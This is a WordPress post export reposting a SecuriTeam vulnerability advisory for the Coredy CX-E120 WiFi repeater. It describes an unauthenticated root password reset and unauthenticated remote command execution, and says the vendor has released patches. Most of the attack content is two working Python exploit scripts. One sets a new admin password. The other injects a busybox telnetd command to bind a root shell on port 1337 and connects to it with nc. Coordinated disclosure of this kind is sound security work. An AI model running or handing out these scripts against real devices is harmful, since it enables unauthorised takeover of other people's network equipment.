{"id":10710,"date":"2017-12-04T14:19:03","date_gmt":"2017-12-04T22:19:03","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/12\/04\/news-4482\/"},"modified":"2017-12-04T14:19:03","modified_gmt":"2017-12-04T22:19:03","slug":"news-4482","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/12\/04\/news-4482\/","title":{"rendered":"SSD Advisory \u2013 Coredy CX-E120 Repeater Multiple Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 04 Dec 2017 09:37:02 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3556\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3556');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes two (2) vulnerabilities found in Coredy CX-E120 Repeater.<\/p>\n<p>The Coredy CX-E120 WiFi Range Extender is &#8220;a network device with multifunction, which can be using for increasing the distance of a WiFi network by boosting the existing WiFi signal and enhancing the overall signal quality over long distances. An extender repeats the signals from an existing WiFi router or access point.&#8221;<\/p>\n<p>The vulnerabilities found are:<\/p>\n<ul>\n<li>Unauthenticated Root Password Reset<\/li>\n<li>Unauthenticated Remote Command Execution<\/li>\n<\/ul>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Corben Douglas (@sxcurity), has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> Coredy has released patches to address these vulnerabilities (WN575A3-A-RPTA3-75W.M4300.01.GD.2017Nov22-WEBC.bin).<\/p>\n<p><span id=\"more-3556\"><\/span><\/p>\n<p><strong><u>Vulnerabilities details<\/u><\/strong><br \/> <strong>Unauthenticated Root Password Reset<\/strong><br \/> An unauthenticated user is able to send a POST request to <em>\/cgi-bin\/adm.cgi<\/em> which can then be used to reset the root password with parameter <em>page=sysAdm<\/em>, <em>username=<\/em>,<br \/>  and the values of the new password: <em>newpass=<\/em> and <em>confpass=<\/em>.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a25c9d6aea3a907831607\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/env python    import sys,requests, httplib    def main():  \tip = sys.argv[1]  \tport = sys.argv[2]  \tuser = sys.argv[3]  \tpassword = sys.argv[4]     \ttarget = ip+&#8217;:&#8217;+port+&#8217;\/cgi-bin\/adm.cgi&#8217;  \theaders = {  \t\t&#8216;user-agent&#8217;:&#8217;repeater-pwn&#8217;,  \t\t&#8216;Content-Type&#8217;:&#8217;application\/x-www-form-urlencoded&#8217;,  \t}  \tdata = &#8216;page=sysAdm&amp;username=&#8217;+user+&#8217;&amp;newpass=&#8217;+password+&#8217;&amp;confpass=&#8217;+password  \treq = requests.post(target,data,headers=headers)    try:  \tmain()  except IndexError:  \tprint(&#8220;Usage: python &#8220;+sys.argv[0]+&#8221; http:\/\/&lt;target&gt; &lt;port&gt; admin newpassword&#8221;)  except requests.exceptions.ChunkedEncodingError:  \tprint(&#8220;n\u000033[92m[+] Attack Sent\u000033[0mn\u000033[91m[+] Try login with new credentials\u000033[0m&#8221;)  except httplib.IncompleteRead:  \tprint(&#8220;n\u000033[92m[+] Attack Sent\u000033[0mn\u000033[91m[+] Try login with new credentials\u000033[0m&#8221;)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0023 seconds] -->  <\/p>\n<p><strong>Remote Command Execution <\/strong><br \/> An unauthenticated user is able to send a POST request to <em>\/cgi-bin\/adm.cgi<\/em> with the following parameters: <em>page=sysCMD<\/em>, <em>SystemCommandSubmit=Apply<\/em>, and <em>command=<\/em> with the command you run to run. The input is passed as root cmd command for execution.<\/p>\n<p><strong>Proof of concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a25c9d6aea43743914178\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/env python  import sys,os,requests  from lxml import html    def main():  \tip = sys.argv[1]  \tprt = sys.argv[2]  \tcmd = &#8216;\/bin\/busybox telnetd -l\/bin\/sh -p1337&#8217;    \ttarget = &#8216;http:\/\/&#8217;+ip+&#8217;:&#8217;+prt+&#8217;\/cgi-bin\/adm.cgi&#8217;    \tpayload = &#8216;page=sysCMD&amp;command=&#8217;+cmd+&#8217;&amp;SystemCommandSubmit=Apply&#8217;  \theaders = {  \t&#8216;User-Agent&#8217;: &#8216;repeater-pwn&#8217;,  \t&#8216;Content-Type&#8217;: &#8216;application\/x-www-form-urlencoded&#8217;,  \t&#8216;Referer&#8217;: &#8216;http:\/\/&#8217;+ip+&#8217;:&#8217;+prt+&#8217;\/webcmd.shtml&#8217;  \t}    \tr = requests.post(target,data=payload, headers=headers)   \tfinal = requests.get(r.url)  \t#pwnd = html.fromstring(final.content)  \t#result = pwnd.xpath(&#8216;\/\/textarea\/text()&#8217;)  \t#print result  \tprint &#8220;n[+] ATTACK SENT&#8221;  \tprint &#8220;[+] Attempted to spawn \/bin\/sh on port 1337&#8230;attempting to connectn&#8221;  \tos.system(&#8220;nc &#8221; +ip+ &#8216; 1337&#8217;)  try:  \tmain()  except IndexError:  \tprint(&#8220;Usage: python &#8220;+sys.argv[0]+&#8221; &lt;IP&gt; &lt;PORT&gt;n&#8221;)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a25c9d6aea43743914178-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a25c9d6aea43743914178-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a25c9d6aea43743914178-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a25c9d6aea43743914178-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a25c9d6aea43743914178-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a25c9d6aea43743914178-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a25c9d6aea43743914178-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a25c9d6aea43743914178-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a25c9d6aea43743914178-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a25c9d6aea43743914178-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a25c9d6aea43743914178-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a25c9d6aea43743914178-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a25c9d6aea43743914178-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a25c9d6aea43743914178-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a25c9d6aea43743914178-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a25c9d6aea43743914178-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a25c9d6aea43743914178-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a25c9d6aea43743914178-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a25c9d6aea43743914178-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a25c9d6aea43743914178-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a25c9d6aea43743914178-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a25c9d6aea43743914178-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a25c9d6aea43743914178-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a25c9d6aea43743914178-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a25c9d6aea43743914178-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a25c9d6aea43743914178-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a25c9d6aea43743914178-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a25c9d6aea43743914178-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a25c9d6aea43743914178-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a25c9d6aea43743914178-30\">30<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a25c9d6aea43743914178-1\"><span class=\"crayon-p\">#!\/usr\/bin\/env python<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a25c9d6aea43743914178-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a25c9d6aea43743914178-3\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">lxml <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">html<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a25c9d6aea43743914178-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a25c9d6aea43743914178-5\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a25c9d6aea43743914178-6\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a25c9d6aea43743914178-7\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">prt<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a25c9d6aea43743914178-8\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\/bin\/busybox telnetd -l\/bin\/sh -p1337&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a25c9d6aea43743914178-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a25c9d6aea43743914178-10\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;http:\/\/&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;:&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">prt<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;\/cgi-bin\/adm.cgi&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a25c9d6aea43743914178-11\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a25c9d6aea43743914178-12\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;page=sysCMD&amp;command=&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;&amp;SystemCommandSubmit=Apply&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a25c9d6aea43743914178-13\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a25c9d6aea43743914178-14\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-s\">&#8216;User-Agent&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;repeater-pwn&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a25c9d6aea43743914178-15\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-s\">&#8216;Content-Type&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;application\/x-www-form-urlencoded&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a25c9d6aea43743914178-16\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-s\">&#8216;Referer&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;http:\/\/&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;:&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">prt<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;\/webcmd.shtml&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a25c9d6aea43743914178-17\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a25c9d6aea43743914178-18\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a25c9d6aea43743914178-19\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a25c9d6aea43743914178-20\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-m\">final<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a25c9d6aea43743914178-21\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#pwnd = html.fromstring(final.content)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a25c9d6aea43743914178-22\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#result = pwnd.xpath(&#8216;\/\/textarea\/text()&#8217;)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a25c9d6aea43743914178-23\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#print result<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a25c9d6aea43743914178-24\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;n[+] ATTACK SENT&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a25c9d6aea43743914178-25\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Attempted to spawn \/bin\/sh on port 1337&#8230;attempting to connectn&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a25c9d6aea43743914178-26\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">system<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;nc &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216; 1337&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a25c9d6aea43743914178-27\"><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a25c9d6aea43743914178-28\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a25c9d6aea43743914178-29\"><span class=\"crayon-e\">except <\/span><span class=\"crayon-v\">IndexError<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a25c9d6aea43743914178-30\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Usage: python &#8220;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8221; &lt;IP&gt; &lt;PORT&gt;n&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0023 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3556\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 04 Dec 2017 09:37:02 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes two (2) vulnerabilities found in Coredy CX-E120 Repeater. The Coredy CX-E120 WiFi Range Extender is &#8220;a network device with multifunction, which can be using for increasing the distance of a WiFi network by boosting the existing WiFi signal and enhancing the overall signal quality over long distances. An extender &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3556\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Coredy CX-E120 Repeater Multiple Vulnerabilities<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[16453,11851,10757,12136],"class_list":["post-10710","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-password-reset","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10710","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10710"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10710\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10710"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10710"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10710"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}